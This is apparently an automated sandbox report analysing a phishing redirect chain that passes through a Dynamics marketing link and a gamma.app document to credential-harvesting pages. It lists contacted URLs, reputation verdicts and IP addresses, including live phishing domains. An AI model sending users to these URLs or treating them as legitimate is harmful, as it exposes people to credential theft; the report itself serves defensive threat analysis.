                                                                                                                    https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638778966462075130.YjYyYTE5NjEtNzNjZC00ZWVjLTlmNWEtZTc0MTQ1ZTliZThlMzA5MzU3YzQtYTcwZi00MGM4LWFiMjItYTdhZjYzYmRmMzNh&ui_locales=en-US&mkt=en-US&client-request-id=93e1aafa-c131-4cd6-a0d3-880abb03e634&state=LprAaNLdv9qrQ_HpSNBFIwg23A3EZq7xqhLsg3F9y4a5FCgOITc7vSQ9FkNAS8aKXgyTAW222JkKqXumtf9KkoHqhw8jU52tGuZmuKF1kQ3O8dyzl_ClDCAy3pmPWbCAEBRGUFF5WCb6etjZVZ1GFovo3ZVgBNZ2Hp3vTXTuDRUpP7GOQg2TsaI0UFfDlnYyUvSjHBF6ylzyZuOUNaZkmzcLvZmmfUFtjPsSZGfJTBkLULMf7OhKGoUx0CvRbBjxOCkjiPYBKfP-w1_3TvibNQ&x-client-SKU=ID_NET8_0&x-client-ver=8.3.0.0false
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://events.api.gamma.app/v1/tfalse
                                                                                                                      high
                                                                                                                      https://gamma.app/_next/static/chunks/9639-5367407e5eee259b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://api-iam.intercom.io/messenger/web/metricsfalse
                                                                                                                        high
                                                                                                                        https://gamma.app/_next/static/chunks/9484.2d145ec231909a76.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://gamma.app/_next/static/chunks/7762-42f8cc94865ab3c9.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://gamma.app/_next/static/chunks/316-91fc125afa02f5ee.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://gamma.app/_next/static/chunks/7811-95fc21fe63dec224.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://js.intercomcdn.com/vendors~app-modern.ea92d9fd.jsfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://gamma.app/_next/static/chunks/847-80bc03112a432dd0.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                                                                                                          high
                                                                                                                          https://gamma.app/_next/static/chunks/3589-9680b5f77c624cec.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://cdn.iframe.ly/embed.jsfalse
                                                                                                                            high
                                                                                                                            https://gamma.app/_next/static/chunks/4324-58e867c6ffdd9831.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://gamma.app/_next/static/chunks/9b583bcd-e94a9f27afcc219c.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://gamma.app/_next/static/chunks/9006-f6aba7c581008a42.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://office.com/loginfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://wordl.digitaldocuments.it.com/google.phpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://gamma.app/_next/static/chunks/d08a6a05-cd94e662b24272fc.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://gamma.app/favicons/favicon-192.svgfalse
                                                                                                                              high
                                                                                                                              https://gamma.app/_next/static/chunks/8495-73c6d4d8f3c3ec48.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://gamma.app/_next/static/chunks/webpack-035e660fd527d215.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://js.intercomcdn.com/frame-modern.a4c0ff37.jsfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                                                                                                                high
                                                                                                                                https://js.intercomcdn.com/app-modern.d84b507f.jsfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://gytqwxqrwvsvqlclcdpq.digitaldocuments.it.com/false
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://gamma.app/_next/static/chunks/8325-4eb976cbb20bec79.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://gamma.app/_next/static/KSZpz2RxLtBUY3-TtqqO6/_buildManifest.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://p.typekit.net/p.css?s=1&k=tiw2cwq&ht=tk&f=10870.10872.10873.10874.28201.28205.28208.28222.28225.28226.28227.28238.32157.32159.32163.32164&a=2326044&app=typekit&e=cssfalse
                                                                                                                                  high
                                                                                                                                  https://gamma.app/_next/static/chunks/4229-b14fe1f0c105af0b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://gamma.app/_next/static/chunks/framework-89ee881bc4e530f4.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://dcumentfile.us-southeast-1.linodeobjects.com/dcumentready.htmltrue
                                                                                                                                    unknown
                                                                                                                                    https://gamma.app/_next/static/chunks/4055-15efd5d6b1df4e7d.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://gamma.app/_next/static/chunks/995-984ec3894744e0be.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://gamma.app/_next/static/chunks/998ccc15-d28324c84824644b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://gamma.app/_next/static/chunks/5884-117f0ad769ed640f.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://canny.io/sdk.jsfalse
                                                                                                                                      high
                                                                                                                                      https://app.launchdarkly.com/sdk/evalx/61e83cfd8ac5a016e6f0d0b6/contexts/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQiLCJicm93c2VyIjp7Im5hbWUiOiJDaHJvbWUiLCJ2ZXJzaW9uIjoiMTM0LjAuMC4wIn0sImxvY2FsZSI6ImVuLVVTIiwibG9jYXRpb24iOnsiY2l0eSI6IiIsImNvdW50cnkiOiJVUyIsImxhdGl0dWRlIjozNy43NTEsImxvbmdpdHVkZSI6LTk3LjgyMn19fQ?withReasons=truefalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://clientstream.launchdarkly.com/eval/61e83cfd8ac5a016e6f0d0b6/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQifSwid29ya3NwYWNlIjp7ImtleSI6ImFkM3dra2I1bDZvYW8zNyIsIm5hbWUiOiJNSUNIQUVMIEpPSE5TT04ncyBXb3Jrc3BhY2UiLCJwbGFuIjoicHJvIn19?withReasons=truefalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://gamma.app/_next/static/chunks/3641-46713cb4c5d1216e.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://a.nel.cloudflare.com/report/v4?s=hanENjgYT39DxVCKn8ti8oBkevRR%2BTNs9cWEDL47BVXtd%2FXA4srns2Dhoy8Ulw%2Bo62nP4oZ%2BBd8%2Bh%2FhrIM5xALTut2e%2BqqfFdmmF%2BNx1D1ZRs2LjP%2FWRjy1cNfn8GbaqCi4%3Dfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://clientstream.launchdarkly.com/eval/61e83cfd8ac5a016e6f0d0b6/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQifX0?withReasons=truefalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://gamma.app/_next/static/css/d87801e5487946cc.css?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://cdn.optimizely.com/js/20579410255.jsfalse
                                                                                                                                        high
                                                                                                                                        https://js.intercomcdn.com/app~tooltips-modern.67d65220.jsfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://api-iam.intercom.io/messenger/web/pingfalse
                                                                                                                                          high
                                                                                                                                          https://gamma.app/_next/static/chunks/4327-a439db94fcb11d52.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://gamma.app/_next/static/chunks/69bd6bf3-8eac31bce3de269a.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://gamma.app/_next/static/chunks/659-8a6828fad9a08284.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://gamma.app/_next/static/chunks/9786-8aee26c1eec5d36a.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://gamma.app/_next/static/chunks/1786-a1cc54383f32c7ea.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://assets.churnkey.co/js/app.js?appId=7blc4aqmpfalse
                                                                                                                                            high
                                                                                                                                            https://gamma.app/_next/static/chunks/2edb282b-c727a725ba9cab5d.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://gamma.app/_next/static/chunks/9695-8f8ecdaf663cd4dd.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://gamma.app/_next/static/chunks/996-b1f03589c07bff77.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svgfalse
                                                                                                                                              high
                                                                                                                                              https://gamma.app/_next/static/chunks/5966-1eaa7198d39fb727.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://gamma.app/_next/static/chunks/1368-a34fc175a13a2b77.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://public-usa.mkt.dynamics.com/favicon.icofalse
                                                                                                                                                high
                                                                                                                                                https://www.office.com/loginfalse
                                                                                                                                                  high
                                                                                                                                                  https://gamma.app/_next/static/chunks/4483.b1e22900348e682f.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://gamma.app/_next/static/chunks/b155a556-6216235a369a735d.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://gamma.app/_next/static/chunks/3d35b88c.89c8cbcdea31a14b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://cdn.jsdelivr.net/gh/pranaynamnaik/files@latest/micro-123787483.pngfalse
                                                                                                                                                    high
                                                                                                                                                    https://gamma.app/_next/static/chunks/pages/_app-37f49d3b6c419859.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://gamma.app/_next/static/chunks/572-26a6ed58c4920db8.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://cdn.gamma.app/_app_static/js/tiktoken-640a99ed3ce5ba67.wasmfalse
                                                                                                                                                      high
                                                                                                                                                      https://7601613767-1317754460.cos.ap-bangkok.myqcloud.com/attach%2Fbootstrap.min.jsfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://gamma.app/_next/static/chunks/b13ba9de-693ee4b2b0cb0b28.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://api.gamma.app/graphqlfalse
                                                                                                                                                        high
                                                                                                                                                        https://gamma.app/_next/static/chunks/8766-87c6e55349e9bebe.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://gamma.app/favicons/pwa-icon-512x512.pngfalse
                                                                                                                                                          high
                                                                                                                                                          https://events.launchdarkly.com/events/diagnostic/61e83cfd8ac5a016e6f0d0b6false
                                                                                                                                                            high
                                                                                                                                                            https://gamma.app/_next/static/chunks/b4d7d80c-b21e42481057053e.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://logx.optimizely.com/v1/eventsfalse
                                                                                                                                                              high
                                                                                                                                                              https://dcumentfile.us-southeast-1.linodeobjects.com/favicon.icotrue
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              https://gamma.app/_next/static/chunks/1743016e.cafbf12bf63073bf.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://gamma.app/_next/static/css/f8b783c6ab1b2b30.css?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://gamma.app/_next/static/chunks/64bbefcc-ad34eaf1d0f1c936.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://public-usa.mkt.dynamics.com/api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/r/testfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://gamma.app/_next/static/chunks/6953-71c1fc7276963d58.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://events.api.gamma.app/v1/user-contextfalse
                                                                                                                                                                high
                                                                                                                                                                https://gamma.app/_next/static/chunks/1970-fb7b0eada1a1d383.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://gamma.app/_next/static/KSZpz2RxLtBUY3-TtqqO6/_ssgManifest.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45false
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                104.21.48.1
                                                                                                                                                                wordl.digitaldocuments.it.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                13.107.6.156
                                                                                                                                                                office.comUnited States
                                                                                                                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                172.67.71.250
                                                                                                                                                                assets.churnkey.coUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                104.16.80.73
                                                                                                                                                                static.cloudflareinsights.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                151.101.130.137
                                                                                                                                                                code.jquery.comUnited States
                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                34.237.73.95
                                                                                                                                                                nexus-websocket-a.intercom.ioUnited States
                                                                                                                                                                14618AMAZON-AESUSfalse
                                                                                                                                                                34.49.241.189
                                                                                                                                                                logx.optimizely.comUnited States
                                                                                                                                                                2686ATGS-MMD-ASUSfalse
                                                                                                                                                                108.138.7.117
                                                                                                                                                                cdn.iframe.lyUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                35.190.80.1
                                                                                                                                                                a.nel.cloudflare.comUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                108.138.26.124
                                                                                                                                                                widget.intercom.ioUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                142.250.186.74
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                142.250.184.195
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                95.101.182.98
                                                                                                                                                                e329293.dscd.akamaiedge.netEuropean Union
                                                                                                                                                                20940AKAMAI-ASN1EUfalse
                                                                                                                                                                34.195.170.131
                                                                                                                                                                unknownUnited States
                                                                                                                                                                14618AMAZON-AESUSfalse
                                                                                                                                                                13.248.151.210
                                                                                                                                                                clientstream-ga.launchdarkly.comUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                104.18.186.31
                                                                                                                                                                cdn.jsdelivr.net.cdn.cloudflare.netUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                95.101.54.121
                                                                                                                                                                a1874.dscg1.akamai.netEuropean Union
                                                                                                                                                                34164AKAMAI-LONGBfalse
                                                                                                                                                                43.128.193.190
                                                                                                                                                                cos.ap-bangkok.myqcloud.comJapan4249LILLY-ASUSfalse
                                                                                                                                                                3.140.6.184
                                                                                                                                                                unknownUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                52.146.76.30
                                                                                                                                                                prdia888eus0aks.mkt.dynamics.comUnited States
                                                                                                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                216.58.206.46
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                142.250.186.106
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                13.107.253.72
                                                                                                                                                                s-part-0044.t-0009.fb-t-msedge.netUnited States
                                                                                                                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                172.217.18.106
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                95.101.54.200
                                                                                                                                                                a1988.dscg1.akamai.netEuropean Union
                                                                                                                                                                34164AKAMAI-LONGBfalse
                                                                                                                                                                104.17.25.14
                                                                                                                                                                cdnjs.cloudflare.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                95.101.182.112
                                                                                                                                                                unknownEuropean Union
                                                                                                                                                                20940AKAMAI-ASN1EUfalse
                                                                                                                                                                104.18.66.57
                                                                                                                                                                cdn.optimizely.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                104.18.10.207
                                                                                                                                                                maxcdn.bootstrapcdn.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                216.58.206.74
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                18.224.12.105
                                                                                                                                                                event-tracking-prod-1378027167.us-east-2.elb.amazonaws.comUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                216.58.206.78
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                104.18.10.200
                                                                                                                                                                cdn.gamma.appUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                54.161.6.100
                                                                                                                                                                events.launchdarkly.comUnited States
                                                                                                                                                                14618AMAZON-AESUSfalse
                                                                                                                                                                13.107.246.60
                                                                                                                                                                s-part-0032.t-0009.t-msedge.netUnited States
                                                                                                                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                74.125.206.84
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                40.126.32.76
                                                                                                                                                                www.tm.a.prd.aadg.trafficmanager.netUnited States
                                                                                                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                104.21.112.1
                                                                                                                                                                gytqwxqrwvsvqlclcdpq.digitaldocuments.it.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                151.101.194.217
                                                                                                                                                                c3.shared.global.fastly.netUnited States
                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                142.250.186.132
                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                20.209.74.225
                                                                                                                                                                unknownUnited States
                                                                                                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                142.250.186.99
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                194.195.208.174
                                                                                                                                                                unknownGermany
                                                                                                                                                                6659NEXINTO-DEfalse
                                                                                                                                                                104.21.16.1
                                                                                                                                                                unknownUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                142.250.186.163
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                104.18.11.207
                                                                                                                                                                stackpath.bootstrapcdn.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                104.18.11.200
                                                                                                                                                                imgproxy.gamma.appUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                34.120.195.249
                                                                                                                                                                o698378.ingest.sentry.ioUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                18.66.147.27
                                                                                                                                                                canny.ioUnited States
                                                                                                                                                                3MIT-GATEWAYSUSfalse
                                                                                                                                                                18.245.46.55
                                                                                                                                                                js.intercomcdn.comUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                34.233.102.105
                                                                                                                                                                api-iam.intercom.ioUnited States
                                                                                                                                                                14618AMAZON-AESUSfalse
                                                                                                                                                                IP
                                                                                                                                                                192.168.2.16
                                                                                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                Analysis ID:1641719
                                                                                                                                                                Start date and time:2025-03-18 13:09:35 +01:00
                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                Overall analysis duration:
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                Sample URL:https://public-usa.mkt.dynamics.com/api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/r/FMPIXkRqqkmv-j_Li7QBAAEAAAA?target={"TargetUrl"%3A"https%3A%2F%2Fgamma.app%2Fdocs%2FJanel-Group-Completed-Document-x686r1ir4nghubz%3Fmode%3Dpresent%23card-an1daph37h4un5p"%2C"RedirectOptions"%3A{"5"%3Anull%2C"0"%3Anull}}&digest=O1MpDB0efooTe4PN%2BrbvabY6GTxgYZEijI2csju%2FBYg%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15ee
                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                Number of analysed new started processes analysed:12
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                Technologies:
                                                                                                                                                                • EGA enabled
                                                                                                                                                                Analysis Mode:stream
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal72.phis.win@24/12@100/216
                                                                                                                                                                • Exclude process from analysis (whitelisted): svchost.exe
                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 216.58.206.78, 142.250.184.195, 216.58.206.46, 74.125.206.84, 142.250.186.174, 142.250.185.238
                                                                                                                                                                • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                                                                • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
